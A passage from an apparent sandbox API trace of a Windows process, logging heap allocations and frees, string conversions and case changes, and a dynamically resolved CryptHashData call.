hHeap=0x2af0000) returned 1 [0212.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0212.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0212.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0212.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70a0 [0212.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69af0 [0212.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0212.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0212.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0212.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0212.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0212.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0212.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0212.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0212.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0212.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0212.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0212.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0212.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3) returned 0x2a71c58 [0212.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0212.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0212.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0212.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0212.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0212.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0212.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0212.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0212.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0212.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0212.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3) returned 0x2a71d88 [0212.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69af0 | out: hHeap=0x2af0000) returned 1 [0212.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0212.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0212.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0212.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0212.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0212.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0212.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0212.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0212.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0212.210] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0212.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0212.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab2a8 [0212.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0212.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0212.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0212.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0212.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0212.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0212.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0212.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0212.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0212.210] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0212.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0212.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0212.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0212.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0212.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0212.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0212.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0212.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0212.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0212.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0212.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0212.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0212.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0212.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0212.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0212.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0212.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0212.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0212.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0212.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0212.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0212.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0212.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0212.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0212.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0212.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0212.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0212.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0212.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0212.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0212.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0212.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0212.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0212.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0212.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0212.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fc0 [0212.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69760 [0212.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0212.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0212.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0212.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0212.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0212.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0212.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0212.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0212.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0212.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0212.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0212.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0212.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0212.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0212.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7140 [0212.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69850 [0212.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0212.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0212.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0212.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69850 | out: hHeap=0x2af0000) returned 1 [0212.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0212.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0212.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0212.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0212.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0212.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0212.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0212.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0212.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0212.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0212.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0212.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0212.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0212.214] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0212.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0212.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0212.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0212.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0212.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0212.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0212.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0212.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0212.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0212.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0212.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0212.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0212.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0212.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0212.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0212.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0212.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0212.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0212.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0212.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0212.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0212.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0212.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0212.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0212.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0212.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0212.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0212.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0212.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0212.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0212.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0212.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0212.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0212.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0212.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0212.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0212.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0212.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0212.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe) returned 0x2aab608 [0212.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab608, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0212.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.216] GetProcAddress (hModule=0x76390000, lpProcName="CryptHashData") returned 0x763aeef0 [0212.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0212.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0212.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0212.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0212.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0212.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0212.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0212.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0212.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0212.217] CryptHashData (hHash=0x9e2078, pbData=0x2a71ce8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0212.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865040 [0212.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f40 [0212.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0212.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0212.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0212.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0212.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0212.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0212.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0212.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0212.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0212.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0212.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0212.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0212.217] HeapFree (in: hHeap=0x2af0000, 